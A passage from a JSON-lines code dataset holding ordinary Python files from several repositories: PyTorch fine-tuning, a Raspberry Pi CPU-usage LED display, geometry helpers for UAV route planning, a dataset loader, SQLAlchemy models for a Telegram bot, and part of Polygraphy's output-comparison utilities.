name1, param1 in params1:\n if name1 in dict_params2:\n dict_params2[name1].data.copy_(param1.data) \n \n criterion = nn.NLLLoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n \n n_train = X_train.shape[0]\n n_val = X_val.shape[0]\n \n best_loss = 9999\n best_epoch = 0\n # Train the model\n for epoch in range(num_epochs):\n permutation = torch.randperm(n_train)\n \n loss_avg = 0\n for i in range(0, n_train, batch_size):\n model.train()\n optimizer.zero_grad()\n \n indices = permutation[i:i+batch_size]\n batch_x, batch_y = X_train[indices], y_train[indices]\n batch_x = Variable(torch.from_numpy(batch_x)).to(device)\n batch_y = Variable(torch.from_numpy(batch_y)).to(device)\n \n outs = model(batch_x.float())\n \n # obtain the loss function\n loss = criterion(outs, batch_y.long())\n \n loss.backward()\n optimizer.step()\n \n loss_avg += loss.item()*batch_x.shape[0]/n_train\n \n with torch.no_grad():\n idxs = torch.arange(n_val)\n correct = 0\n val_samples = 0\n val_loss_avg = 0\n for i in range(0, n_val, batch_size):\n model.eval()\n \n indices = idxs[i:i+batch_size]\n batch_x, batch_y = X_val[indices], y_val[indices]\n batch_x = Variable(torch.from_numpy(batch_x)).to(device)\n batch_y = Variable(torch.from_numpy(batch_y)).to(device)\n batch_y = batch_y.long().flatten()\n \n outs = model(batch_x.float())\n \n loss = criterion(outs, batch_y)\n val_loss_avg += loss.item()*batch_x.shape[0]/n_val\n \n arg_out = torch.argmax(outs, dim=-1)\n correct += (arg_out == batch_y).float().sum()\n val_samples += batch_y.shape[0]\n val_acc = correct / float(val_samples)\n if val_loss_avg < best_loss:\n print('best so far (saving):')\n best_loss = val_loss_avg\n best_epoch = epoch\n torch.save(model, save_folder+'/'+new_name+'.pth')\n if epoch - best_epoch > patience:\n break\n print(f'Epoch {epoch}: train_loss {loss_avg:0.4f} val_loss {val_loss_avg:0.4f} val_acc {100*val_acc:.2f}%')\n print('done. have a nice day!')\n\nif __name__ == '__main__':\n finetune('./NFL_transformer_settings', '../data/middle.pkl', './saved_models', 'without_pretraining (36%)', \n load_date=None, yaml_pretraining='NFL_trajectory_settings')\n","repo_name":"camzach/NETS-NFL","sub_path":"NETS/finetuning.py","file_name":"finetuning.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31638299092","text":"#! /usr/bin/python3\n\n# Display the cpu usage of the 4 cores on the pi-topPULSE led matrix\n#\n# for Raspberry Pi 3\n#\n# by @rricharz\n\nfrom ptpulse import ledmatrix\nimport os\nimport time\n\nlastWork = [0, 0, 0, 0]\nlastIdle = [0, 0, 0, 0]\n\n\ndef getCpuRates():\n global lastWork, lastIdle\n rate = [0, 0, 0, 0]\n f = open(\"/proc/stat\", \"r\")\n line = \"\"\n for i in range(0, 4):\n while not \"cpu\"+str(i) in line:\n line = f.readline()\n # print(line)\n splitline = line.split()\n work = int(splitline[1]) + int(splitline[2]) + int(splitline[3])\n idle = int(splitline[4])\n diffWork = work - lastWork[i]\n diffIdle = idle - lastIdle[i]\n rate[i] = float(diffWork) / float(diffIdle+diffWork)\n lastWork[i] = work\n lastIdle[i] = idle\n f.close()\n return rate\n\n\nledmatrix.rotation(0)\nwhile True:\n rate = getCpuRates()\n ledmatrix.clear()\n for i in range(0, 4):\n level = int(6.99 * rate[i])\n if level < 4:\n r = 0\n g = 255\n b = 0\n elif level < 6:\n r = 255\n g = 255\n b = 6\n else:\n r = 255\n g = 0\n b = 0\n for y in range(0, level+1):\n ledmatrix.set_pixel(2 * i, y, r, g, b)\n\n ledmatrix.show()\n time.sleep(1)\n\n\nledmatrix.clear()\nledmatrix.show()\n","repo_name":"Helenous/Pi-top-Pulse","sub_path":"examples/showusage.py","file_name":"showusage.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"598421414","text":"import copy\nimport math\nimport constants\n\nimport time\nimport shapely.geometry\n\n# ----------------------------------------------- LOGGER SET UP ------------------------------------------------\nimport logging\nimport datetime\nimport os\n\ndate = datetime.date.today()\nlogging.basicConfig(level=logging.DEBUG, filename=os.path.join(os.getcwd(), 'logs/navy_log_' + str(date) + '.log'),\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', datefmt=\"%H:%M:%S\")\nlogger = logging.getLogger(\"GM\")\nlogger.setLevel(logging.DEBUG)\n\n\n# --------------------------------------------- END LOGGER SET UP ------------------------------------------------\n\ndef calculate_distance(a: object, b: object, lon_lat_to_km=True) -> float:\n \"\"\"\n Calculates Euclidean distance\n :param a: Point\n :param b: Point\n :param lon_lat_to_km: bool, whether distance translated from lon_lat\n :return: Float distance\n \"\"\"\n t_0 = time.perf_counter()\n\n if lon_lat_to_km:\n latitudinal_distance_in_km = longitudinal_distance_to_km(a.y, b.y)\n mean_latitude = (a.y + b.y) / 2\n longitudinal_distance_in_km = latitudinal_distance_to_km(a.x, b.x, mean_latitude)\n distance = math.sqrt(latitudinal_distance_in_km ** 2 + longitudinal_distance_in_km ** 2)\n else:\n distance = math.sqrt((a.x - b.x) ** 2 + (a.y - b.y) ** 2)\n\n t_1 = time.perf_counter()\n constants.time_spent_calculating_distance += (t_1 - t_0)\n return distance\n\n\ndef longitudinal_distance_to_km(lon_1: float, lon_2: float) -> float:\n return abs((lon_1 - lon_2) * constants.LATITUDE_CONVERSION_FACTOR)\n\n\ndef latitudinal_distance_to_km(lat_1: float, lat_2: float, approx_long: float) -> float:\n return abs((lat_1 - lat_2) * (constants.LONGITUDE_CONVERSION_FACTOR *\n math.cos(math.radians(approx_long))))\n\n\ndef km_to_longitudinal_distance(kilometers: float) -> float:\n \"\"\"\n Takes kilometers distance and converts it to approximate longitudinal points\n :param kilometers:\n :return:\n \"\"\"\n return kilometers / constants.LATITUDE_CONVERSION_FACTOR\n\n\ndef km_to_latitudinal_distance(kilometers: float, approx_long) -> float:\n \"\"\"\n Takes kilometer distance and converts it to approximate latitudinal points\n :param kilometers:\n :param approx_long:\n :return:\n \"\"\"\n return kilometers / (constants.LONGITUDE_CONVERSION_FACTOR *\n math.cos(math.radians(approx_long)))\n\n\ndef is_between_points(a: object, b: object, tested_point: object) -> bool:\n \"\"\"\n :param a: Point\n :param b: Point\n :param tested_point: Point\n :return:\n \"\"\"\n cross_product = (tested_point.y - a.y) * (b.x - a.x) - (tested_point.x - a.x) * (b.y - a.y)\n\n if abs(cross_product) > 0.001:\n return False\n\n dot_product = (tested_point.x - a.x) * (b.x - a.x) + (tested_point.y - a.y) * (b.y - a.y)\n if dot_product < 0:\n return False\n\n squaredlengthba = (b.x - a.x) * (b.x - a.x) + (b.y - a.y) * (b.y - a.y)\n if dot_product > squaredlengthba:\n return False\n\n return True\n\n\ndef orientation(p: object, q: object, r: object) -> int:\n \"\"\"\n Return numerical orientation\n 1 for clockwise\n -1 for counter-clockwise\n 0 for collinear\n :param p: Point\n :param q: Point\n :param r: Point\n :return:\n \"\"\"\n val = ccw(p, q, r)\n if val > 0:\n return 1\n elif val < 0:\n return -1\n else:\n return 0\n\n\ndef ccw(a: object, b: object, c: object) -> float:\n \"\"\"\n See if going from point b to c is counterclockwise after moving from a to b\n :param a: Point\n :param b: Point\n :param c: Point\n :return:\n \"\"\"\n return (b.x - a.x) * (c.y - a.y) - (b.y - a.y) * (c.x - a.x)\n\n\ndef next_point_ccw(a: object, b: object, c: object) -> bool:\n \"\"\"\n Checks if going from point b to c is clockwise or counterclockwise in reference to the line a to b\n :param a: Point\n :param b: Point\n :param c: Point\n :return:\n \"\"\"\n area = ccw(a, b, c)\n if area < 0:\n return False\n elif area > 0:\n return True\n else: # Not including collinear points\n return False\n\n\ndef shared_segment(p: object, q: object, r: object) -> bool:\n \"\"\"\n See if two vectors p->r and q->r have a shared segment\n :param p: Point\n :param q: Point\n :param r: Point\n :return:\n \"\"\"\n if max(p.x, r.x) >= q.x >= min(p.x, r.x) and max(p.y, r.y) >= q.y >= min(p.y, r.y):\n return True\n else:\n return False\n\n\ndef do_intersect(p1: object, q1: object, p2: object, q2: object) -> bool:\n \"\"\"\n Check intersection from line p1->q1 and line p2->q2\n :param p1: Point - Start point line 1\n :param q1: Point - End point line 1\n :param p2: Point - Start point line 2\n :param q2: Point - End point line 2\n :return:\n \"\"\"\n o_1 = orientation(p1, q1, p2)\n o_2 = orientation(p1, q1, q2)\n o_3 = orientation(p2, q2, p1)\n o_4 = orientation(p2, q2, q1)\n\n # General Case\n if o_1 != o_2 and o_3 != o_4:\n return True\n # Collinear Cases\n elif o_1 == 0 and shared_segment(p1, p2, q1):\n return True\n elif o_2 == 0 and shared_segment(p1, q2, q1):\n return True\n elif o_3 == 0 and shared_segment(p2, p1, q2):\n return True\n elif o_4 == 0 and shared_segment(p2, q1, q2):\n return True\n else:\n return False\n\n\ndef check_if_lines_intersect(line_l: list, line_k: list, except_end_points=True) -> bool:\n \"\"\"\n Check if two lines intersect.\n :param except_end_points: Include or except endpoints in the check\n :param line_l:\n :param line_k:\n :return:\n \"\"\"\n\n line_1 = shapely.geometry.LineString([[line_k[0].x, line_k[0].y], [line_k[1].x, line_k[1].y]])\n line_2 = shapely.geometry.LineString([[line_l[0].x, line_l[0].y], [line_l[1].x, line_l[1].y]])\n if except_end_points:\n # Except if the line shares an endpoint - passing through 2 points on the polygon is handled in the polygon\n # line checker\n # print(f\"{str(line_k[0])}, {str(line_k[1])}, {str(line_l[0])}, {str(line_l[1])}\")\n # print(f\"{line_k[0] == line_l[0]}, {line_k[1] == line_l[0]}, {line_k[0] == line_l[1]}, {line_k[1] == line_l[0]}\")\n if line_k[0] == line_l[0] or line_k[1] == line_l[0] or line_k[0] == line_l[1] or line_k[1] == line_l[1]:\n return False\n # case if point is exactly on the line\n elif (check_if_point_on_line(point=shapely.geometry.Point(line_k[0].x, line_k[0].y), line=line_2) or\n check_if_point_on_line(point=shapely.geometry.Point(line_k[1].x, line_k[1].y), line=line_2) or\n check_if_point_on_line(point=shapely.geometry.Point(line_l[0].x, line_l[0].y), line=line_1) or\n check_if_point_on_line(point=shapely.geometry.Point(line_l[1].x, line_l[1].y), line=line_1)):\n return False\n intersect = line_1.intersects(line_2)\n return intersect\n\n # l_1 = line_l[0]\n # l_2 = line_l[1]\n # k_1 = line_k[0]\n # k_2 = line_k[1]\n #\n # # Shorten lines slightly to avoid endpoints (e.g. if we arrive exactly at polygon point)\n # l_1 = copy.deepcopy(l_1)\n # l_2 = copy.deepcopy(l_2)\n # k_1 = copy.deepcopy(k_1)\n # k_2 = copy.deepcopy(k_2)\n #\n # l_1.x, l_2.x = l_1.x * 0.9999 + l_2.x * 0.0001, l_1.x * 0.0001 + l_2.x * 0.9999\n # l_1.y, l_2.y = l_1.y * 0.9999 + l_2.y * 0.0001, l_1.y * 0.0001 + l_2.y * 0.9999\n #\n # k_1.x, k_2.x = k_1.x * 0.9999 + k_2.x * 0.0001, k_1.x * 0.0001 + k_2.x * 0.9999\n # k_1.y, k_2.y = k_1.y * 0.9999 + k_2.y * 0.0001, k_1.y * 0.0001 + k_2.y * 0.9999\n #\n # return do_intersect(l_1, l_2, k_1, k_2)\n\n\ndef check_if_point_on_line(point, line):\n if isinstance(line, list):\n line = shapely.geometry.LineString([[line[0].x, line[0].y], [line[1].x, line[1].y]])\n if not isinstance(point, shapely.Point):\n point = shapely.geometry.Point(point.x, point.y)\n\n if line.distance(point) < 1e-8:\n return True\n else:\n return False\n\n\ndef maximize_concavity(path: list, polygons: list) -> list:\n \"\"\"\n Check if some parts of the provided route is concave - See if we can remove points inbetween\n without violating any polygons and retaining required points\n :param path: list of points across which is travelled\n :param polygons:\n :return:\n \"\"\"\n # logger.debug(f\"Maximizing concavity for path {[str(p) for p in path]}\")\n shorter_route = [path[0]]\n\n i = 0\n j = len(path) - 1\n\n iterations = 0\n\n while i < len(path):\n p_i = path[i]\n # logger.debug(f\"{i=}, {str(p_i)=}, {j=}, {len(path)=}\")\n iterations += 1\n if iterations > constants.ITERATION_LIMIT:\n raise TimeoutError(\"Concavity Optimization Not Converging.\")\n\n # maintain_point = False\n # for p in path[i+1:j+1]:\n # # See if we run into a point that has to be maintained\n # if p.force_maintain:\n # logger.debug(f\"Forced to maintain point {p}\")\n # p_j = p\n # j = path.index(p)\n # maintain_point = True\n # break\n\n # Otherwise take j the furthest away\n # if not maintain_point:\n p_j = path[j]\n # logger.debug(f\"Taking furthest point {str(p_j)}\")\n\n i_to_j = not any([polygon.check_if_line_through_polygon(p_i, p_j) for polygon in polygons])\n if j == len(path) - 1 and i_to_j:\n shorter_route.append(path[-1])\n\n # logger.debug(f\"Able to reach end of path going from {p_i} to {path[-1]} - returning\"\n # f\"{[str(p) for p in shorter_route]}\")\n return shorter_route\n\n # if we can't go further than 1 step, make that step (we know it is feasible)\n if j == i + 1:\n shorter_route.append(path[j])\n i = j\n j = len(path) - 1\n # logger.debug(f\"Can't make more than one step, going from {p_i} to {p_j}\")\n continue\n\n if i_to_j:\n shorter_route.append(p_j)\n i = j\n j = len(path) - 1\n # logger.debug(f\"Going from {p_i} to {p_j} (latest feasible option)\")\n else:\n j -= 1\n # logger.debug(f\"Not feasible - reducing j\")\n\n\ndef calculate_direction_vector(point_a: object, point_b: object) -> list:\n \"\"\"\n Calculates the normalized direction vector from point a to point b\n :param point_a: point of departure\n :param point_b: point of arrival\n :return:\n \"\"\"\n if point_a is point_b:\n raise ValueError(f\"Traversing between same points: {point_a}\")\n normalisation_value = math.sqrt((point_b.x - point_a.x) ** 2 + (point_b.y - point_a.y) ** 2)\n if normalisation_value == 0:\n logger.warning(f\"Normalisation value of 0 - direction from {str(point_a)} to {str(point_b)}\")\n\n return [0, 0]\n x_change = (point_b.x - point_a.x) / normalisation_value\n y_change = (point_b.y - point_a.y) / normalisation_value\n\n return [x_change, y_change]\n\n\ndef find_lowest_point_in_polygon(points: list) -> object:\n return min(points, key=lambda p: p.y)\n\n\ndef calculate_polar_angle(a: object, b: object) -> float:\n \"\"\"\n calculate polar angle between two points\n :param a: First Point\n :param b: Point relative to first\n :return:\n \"\"\"\n return math.degrees(math.atan2(b.y - a.y, b.x - a.x))\n\n\ndef graham_scan(points: list) -> list:\n \"\"\"\n Applies Graham Scan algorithm to make a convex hull out of a set of points.\n An exception is when the graham scan receives points with \"force_maintain\" characteristics\n This will create a non-convex hull that ensures that these points are contained\n :param points: List of Points objects\n :return:\n \"\"\"\n # logger.debug(\"STARTING GRAHAM SCAN\")\n # logger.debug(f\"Received points: {[str(point) for point in points]}\")\n\n starting_point = find_lowest_point_in_polygon(points)\n points.remove(starting_point)\n\n points.sort(key=lambda p: calculate_polar_angle(starting_point, p))\n convex_hull = [starting_point, points.pop(0)]\n\n for index, point in enumerate(points):\n if index > len(points):\n pass\n elif index == len(points):\n if next_point_ccw(convex_hull[-2], convex_hull[-1], starting_point):\n pass\n else:\n convex_hull.pop()\n convex_hull.append(point)\n else:\n if len(convex_hull) > 2:\n iterations = 0\n while not next_point_ccw(convex_hull[-2], convex_hull[-1], point):\n\n iterations += 1\n if iterations > constants.ITERATION_LIMIT:\n TimeoutError(f\"Unable to locate next CCW point: {convex_hull}\")\n\n if len(convex_hull) > 0:\n convex_hull.pop()\n convex_hull.append(point)\n return convex_hull\n\n\ndef find_closest_reachable_point(target: object, polygon: object) -> object:\n \"\"\"\n :param target: Point - Location from which we want to reach to a polygon\n :param polygon: Nearby Polygon object\n :return:\n \"\"\"\n # logger.debug(f\"Finding closest point - polygon is {[str(p) for p in polygon.points]}\")\n distances = []\n for p in polygon.points:\n obstructed = polygon.check_if_line_through_polygon(p, target)\n if not obstructed:\n distances.append([p, target.distance_to_point(p)])\n else:\n # logger.debug(f\"Unable to reach {p} from {target}.\")\n pass\n\n if len(distances) == 0:\n target.add_point_to_plot(axes=constants.axes_plot, color=\"yellow\", text=\"T\")\n raise ValueError(f\"Could not make a line from {target} to {[str(p) for p in polygon.points]}\")\n closest_point = min(distances, key=lambda x: x[1])[0]\n return closest_point\n\n\ndef check_if_point_in_polygons(polygons, point, exclude_edges=True) -> bool:\n for polygon in polygons:\n if polygon.check_if_contains_point(point, exclude_edges=exclude_edges):\n return True\n return False\n","repo_name":"Salted-Pepper/UAV_surveillance_v2","sub_path":"general_maths.py","file_name":"general_maths.py","file_ext":"py","file_size_in_byte":14058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38968003124","text":"import random\nfrom random import shuffle\n\n\ndef readDataSet(filename, prob):\n file = open(filename, 'r')\n\n lines = [line.strip() for line in file.readlines()]\n attributes = [attribute.strip() for attribute in lines.pop(0).split(\",\")]\n targetAttribute = attributes[len(attributes)-1]\n\n dataSet = []\n for line in lines:\n dataSet.append(dict(zip(attributes, [element.strip() for element in line.split(\",\")])))\n file.close()\n\n shuffle(dataSet)\n newDataSet = depopulateDataSet(dataSet, attributes, targetAttribute, prob)\n\n return newDataSet, attributes, targetAttribute\n\n\ndef depopulateDataSet(dataSet, attributes, targetAttribute, prob):\n # Sceglie con probabilita' p un record del data set, e ne elimina un attributo\n for i in range(0, len(dataSet)-1):\n x = random.random()\n if x <= prob:\n d = dataSet[i]\n # Sceglie l'attributo da rimuovere\n y = random.randint(0, len(attributes)-1)\n if attributes[y] != targetAttribute:\n d[attributes[y]] = '?'\n\n return dataSet","repo_name":"loredeluca/AI_Project","sub_path":"DataSet.py","file_name":"DataSet.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31118687972","text":"from sqlalchemy import Column, String, ForeignKey, Table, Integer, BigInteger, Float, DateTime, Boolean\nfrom sqlalchemy.orm import registry, relationship\n# from datetime import datetime\n\nfrom db import engine\nfrom db.states import UserStates\n\nmapper_registry = registry()\nBase = mapper_registry.generate_base()\n\n# order_product_association = Table(\n# 'orders_products',\n# mapper_registry.metadata,\n# Column('order_id', ForeignKey('orders.id'), primary_key=True),\n# Column('product_id', ForeignKey('products.id'), primary_key=True)\n# )\n\nuser_order_association = Table(\n 'users_orders',\n mapper_registry.metadata,\n Column('user_id', ForeignKey('telegram_users.telegram_id'), primary_key=True),\n Column('order_id', ForeignKey('orders.id'), primary_key=True)\n)\n\n\nclass User(Base):\n __tablename__ = 'telegram_users'\n\n telegram_id = Column(BigInteger, primary_key=True)\n\n username = Column(String(32), default='')\n name = Column(String, default='')\n kaspi = Column(String(20), default='')\n state = Column(String(10), default=UserStates.CREATED.value)\n\n orders = relationship('Order', back_populates='user')\n\n def __repr__(self):\n return f'User<{self.telegram_id}>(username={self.name}, kaspi={self.kaspi}, state={self.state})'\n\n\nclass Order(Base):\n __tablename__ = 'orders'\n\n id = Column(Integer, primary_key=True, autoincrement=True)\n\n is_finished = Column(Boolean, default=False)\n\n chat_id = Column(BigInteger, default='')\n message_id = Column(BigInteger, default='')\n user_id = Column(BigInteger, ForeignKey('telegram_users.telegram_id'))\n\n user = relationship('User', back_populates='orders')\n joined_users = relationship('User', secondary=user_order_association)\n texts = relationship('OrderText', back_populates='order')\n\n # products = relationship('Product', secondary=order_product_association)\n\n def __repr__(self):\n return f'Order<{self.id}>(is_finished={self.is_finished}, user_id={self.user_id}, chat_id={self.chat_id})'\n\n\nclass OrderText(Base):\n __tablename__ = 'order_texts'\n\n id = Column(Integer, primary_key=True, autoincrement=True)\n\n text = Column(String)\n\n user_id = Column(BigInteger, ForeignKey('telegram_users.telegram_id'))\n order_id = Column(Integer, ForeignKey('orders.id'))\n\n user = relationship('User')\n order = relationship('Order', back_populates='texts')\n\n def __repr__(self):\n return f'OrderText<{self.id}>(user_id={self.user_id} order_id={self.order_id} text={self.text})'\n\n\n# class Product(Base):\n\n\n# __tablename__ = 'products'\n#\n# id = Column(Integer, primary_key=True, autoincrement=True)\n# name = Column(String, unique=True)\n# price = Column(Float, default=0)\n# updated_at = Column(DateTime, onupdate=datetime.now, default=datetime.now)\n# updated_by = Column(BigInteger, ForeignKey('telegram_users.telegram_id'))\n# orders = relationship('Order', secondary=order_product_association, back_populates='products')\n#\n# def __repr__(self):\n# return f'Product<{self.id}>(name={self.name} price={self.price})'\n\n\ndef create_tables():\n mapper_registry.metadata.create_all(engine)\n\n\nif __name__ == '__main__':\n create_tables()\n","repo_name":"Jiklopo/biometric-rahmet-bot","sub_path":"db/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":3222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70315574887","text":"import functools\nfrom collections import OrderedDict\n\nfrom polygraphy import mod, util\nfrom polygraphy.comparator import util as comp_util\nfrom polygraphy.logger import G_LOGGER, LogMode\n\nnp = mod.lazy_import(\"numpy\")\n\n\n@mod.export()\nclass OutputCompareResult:\n \"\"\"\n Represents the result of comparing a single output of a single iteration\n between two runners.\n \"\"\"\n\n def __init__(self, passed, max_absdiff, max_reldiff, mean_absdiff, mean_reldiff, median_absdiff, median_reldiff):\n \"\"\"\n Records the required tolerances and other statistics gathered during comparison.\n\n Args:\n passed (bool):\n Whether the error was within acceptable limits.\n max_absdiff (float):\n The minimum required absolute tolerance to consider the outputs equivalent.\n max_reldiff (float):\n The minimum required relative tolerance to consider the outputs equivalent.\n mean_absdiff (float):\n The mean absolute error between the outputs.\n mean_reldiff (float):\n The mean relative error between the outputs.\n median_absdiff (float):\n The median absolute error between the outputs.\n median_reldiff (float):\n The median relative error between the outputs.\n \"\"\"\n self.passed = passed\n self.max_absdiff = max_absdiff\n self.max_reldiff = max_reldiff\n self.mean_absdiff = mean_absdiff\n self.mean_reldiff = mean_reldiff\n self.median_absdiff = median_absdiff\n self.median_reldiff = median_reldiff\n\n def __bool__(self):\n \"\"\"\n Whether the output matched.\n\n Returns:\n bool\n \"\"\"\n return self.passed\n\n def __str__(self):\n return f\"(atol={self.max_absdiff}, rtol={self.max_reldiff})\"\n\n\ndef default_find_output_func(output_name, index, iter_result, base_iter_result):\n found_name = util.find_str_in_iterable(output_name, iter_result.keys(), index)\n if found_name is None:\n return None\n elif found_name != output_name:\n exact_match = util.find_str_in_iterable(found_name, base_iter_result.keys())\n if exact_match == found_name:\n G_LOGGER.verbose(\n f\"Will not compare {found_name} with {output_name}, since the former already has an exact match: {exact_match}\"\n )\n return (\n None # If the found output is being compared against another output already, skip this non-exact match\n )\n G_LOGGER.warning(\n f\"Output names did not match exactly. Assuming {iter_result.runner_name} output: {found_name} corresponds to output: {output_name}\"\n )\n return [found_name]\n\n\ndef run_comparison(func, fail_fast, iter_result0, iter_result1, find_output_func):\n \"\"\"\n Iterates over all the generated outputs and runs `func` to compare them.\n \"\"\"\n output_status = OrderedDict() # OrderedDict[str, bool] Maps output names to whether they matched.\n\n for index, (out0_name, output0) in enumerate(iter_result0.items()):\n out1_names = util.default(find_output_func(out0_name, index, iter_result1), [])\n\n if len(out1_names) > 1:\n G_LOGGER.info(\n f\"Will attempt to compare output: '{out0_name}' [{iter_result0.runner_name}] with multiple outputs: '{list(out1_names)}' [{iter_result1.runner_name}]\"\n )\n\n for out1_name in out1_names:\n if out1_name is None or out1_name not in iter_result1:\n G_LOGGER.warning(\n f\"For output: '{out0_name}' [{iter_result0.runner_name}], skipping corresponding output: '{out1_name}' [{iter_result1.runner_name}], since the output was not found\"\n )\n continue\n\n output1 = iter_result1[out1_name]\n\n G_LOGGER.start(\n f\"Comparing Output: '{out0_name}' (dtype={output0.dtype}, shape={output0.shape}) with '{out1_name}' (dtype={output1.dtype}, shape={output1.shape})\"\n )\n with G_LOGGER.indent():\n output_status[out0_name] = func(out0_name, output0, out1_name, output1)\n if fail_fast and not output_status[out0_name]:\n return output_status\n\n mismatched_output_names = [name for name, matched in output_status.items() if not matched]\n if mismatched_output_names:\n G_LOGGER.error(f\"FAILED | Mismatched outputs: {mismatched_output_names}\")\n else:\n G_LOGGER.finish(f\"PASSED | All outputs matched | Outputs: {list(output_status.keys())}\")\n\n # This is useful for catching cases were Polygraphy does something wrong with the runner output buffers\n if not output_status and (bool(iter_result0.keys()) or bool(iter_result1.keys())):\n r0_name = iter_result0.runner_name\n r0_outs = list(iter_result0.keys())\n r1_name = iter_result1.runner_name\n r1_outs = list(iter_result1.keys())\n G_LOGGER.critical(\n f\"All outputs were skipped, no common outputs found! Note:\\n{r0_name} outputs: {r0_outs}\\n{r1_name} outputs: {r1_outs}\"\n )\n\n return output_status\n\n\n# Provides functions to compare two IterationResults\n@mod.export()\nclass CompareFunc:\n \"\"\"\n Provides functions that can be used to compare two `IterationResult` s.\n \"\"\"\n\n @staticmethod\n def simple(\n check_shapes=None,\n rtol=None,\n atol=None,\n fail_fast=None,\n find_output_func=None,\n check_error_stat=None,\n infinities_compare_equal=None,\n save_heatmaps=None,\n show_heatmaps=None,\n save_error_metrics_plot=None,\n show_error_metrics_plot=None,\n ):\n \"\"\"\n Creates a function that compares two IterationResults, and can be used as the `compare_func` argument\n in ``Comparator.compare_accuracy``.\n\n Args:\n check_shapes (bool):\n Whether shapes must match exactly. If this is False, this function may\n permute or reshape outputs before comparison.\n Defaults to True.\n rtol (Union[float, Dict[str, float]]):\n The relative tolerance to use when checking accuracy.\n This is expressed as a percentage of the second set of output values.\n For example, a value of 0.01 would check that the first set of outputs is within 1% of the second.\n\n This can be provided on a per-output basis using a dictionary. In that case,\n use an empty string (\"\") as the key to specify default tolerance for outputs not explicitly listed.\n Defaults to 1e-5.\n atol (Union[float, Dict[str, float]]):\n The absolute tolerance to use when checking accuracy.\n This can be provided on a per-output basis using a dictionary. In that case,\n use an empty string (\"\") as the key to specify default tolerance for outputs not explicitly listed.\n Defaults to 1e-5.\n fail_fast (bool):\n Whether the function should exit immediately after the first failure.\n Defaults to False.\n find_output_func (Callable(str, int, IterationResult) -> List[str]):\n A callback that returns a list of output names to compare against from the provided\n IterationResult, given an output name and index from another IterationResult.\n The comparison function will always iterate over the output names of the\n first IterationResult, expecting names from the second. A return value of\n `[]` or `None` indicates that the output should be skipped.\n check_error_stat (Union[str, Dict[str, str]]):\n The error statistic to check. Possible values are:\n\n - \"elemwise\": Checks each element in the output to determine if it exceeds both tolerances specified.\n The minimum required tolerances displayed in this mode are only applicable when just one type of tolerance\n is set. Because of the nature of the check, when both absolute/relative tolerance are specified, the required\n minimum tolerances may be lower.\n\n - \"max\": Checks the maximum absolute/relative errors against the respective tolerances. This is the strictest possible check.\n - \"mean\" Checks the mean absolute/relative errors against the respective tolerances.\n - \"median\": Checks the median absolute/relative errors against the respective tolerances.\n\n This can be provided on a per-output basis using a dictionary. In that case,\n use an empty string (\"\") as the key to specify default error stat for outputs not explicitly listed.\n Defaults to \"elemwise\".\n infinities_compare_equal (bool):\n If True, then matching +-inf values in the output have an absdiff of 0.\n If False, then matching +-inf values in the output have an absdiff of NaN.\n Defaults to False.\n save_heatmaps (str):\n [EXPERIMENTAL] Path to a directory in which to save figures of heatmaps of the absolute and relative error.\n Defaults to None.\n show_heatmaps (bool):\n [EXPERIMENTAL] Whether to display heatmaps of the absolute and relative error.\n Defaults to False.\n save_error_metrics_plot (str):\n [EXPERIMENTAL] Path to a directory in which to save the error metrics plots.\n Defaults to None.\n show_error_metrics_plot (bool):\n [EXPERIMENTAL] Whether to display the error metrics plot.\n\n Returns:\n Callable(IterationResult, IterationResult) -> OrderedDict[str, OutputCompareResult]:\n A callable that returns a mapping of output names to `OutputCompareResult` s, indicating\n whether the corresponding output matched.\n \"\"\"\n check_shapes = util.default(check_shapes, True)\n default_rtol = 1e-5\n default_atol = 1e-5\n rtol = util.default(rtol, default_rtol)\n atol = util.default(atol, default_atol)\n fail_fast = util.default(fail_fast, False)\n default_error_stat = \"elemwise\"\n check_error_stat = util.default(check_error_stat, default_error_stat)\n infinities_compare_equal = util.default(infinities_compare_equal, False)\n show_heatmaps = util.default(show_heatmaps, False)\n show_error_metrics_plot = util.default(show_error_metrics_plot, False)\n\n def check_outputs_match(\n out0,\n out0_name,\n out1,\n out1_name,\n per_out_rtol,\n per_out_atol,\n per_out_err_stat,\n runner0_name,\n runner1_name,\n ):\n \"\"\"\n Checks whether two outputs matched.\n\n Args:\n out0 (np.array): The first output.\n out0_name (str): The name of the first output.\n out1 (np.array): The second output.\n out1_name (str): The name of the second output.\n per_out_rtol (float): The relative tolerance to use for comparison.\n per_out_atol (float): The absolute tolerance to use for comparison.\n per_out_err_stat (str): The error statistic to check. See the docstring of ``simple`` for details.\n runner0_name (str): The name of the runner that generated the first output.\n runner1_name (str): The name of the runner that generated the second output.\n\n Returns:\n OutputCompareResult: Details on whether the outputs matched.\n \"\"\"\n VALID_CHECK_ERROR_STATS = [\"max\", \"mean\", \"median\", \"elemwise\"]\n if per_out_err_stat not in VALID_CHECK_ERROR_STATS:\n G_LOGGER.critical(\n f\"Invalid choice for check_error_stat: {per_out_err_stat}.\\nNote: Valid choices are: {VALID_CHECK_ERROR_STATS}\"\n )\n\n G_LOGGER.super_verbose(\n f\"{runner0_name:35} | Output: {out0_name} (dtype={out0.dtype}, shape={out0.shape}):\\n{util.indent_block(out0)}\"\n )\n G_LOGGER.super_verbose(\n f\"{runner1_name:35} | Output: {out1_name} (dtype={out1.dtype}, shape={out1.shape}):\\n{util.indent_block(out1)}\"\n )\n\n # Check difference vs. tolerances\n if np.issubdtype(out0.dtype, np.bool_) and np.issubdtype(out1.dtype, np.bool_):\n absdiff = np.logical_xor(out0, out1)\n else:\n absdiff = np.abs(comp_util.cast_up(out0) - comp_util.cast_up(out1))\n if infinities_compare_equal:\n out0_infinite = np.isinf(out0)\n cond = np.logical_and(out0_infinite, out0 == out1)\n absdiff = np.where(cond, 0, absdiff)\n\n # Add a small epsilon (2e-16) to zero 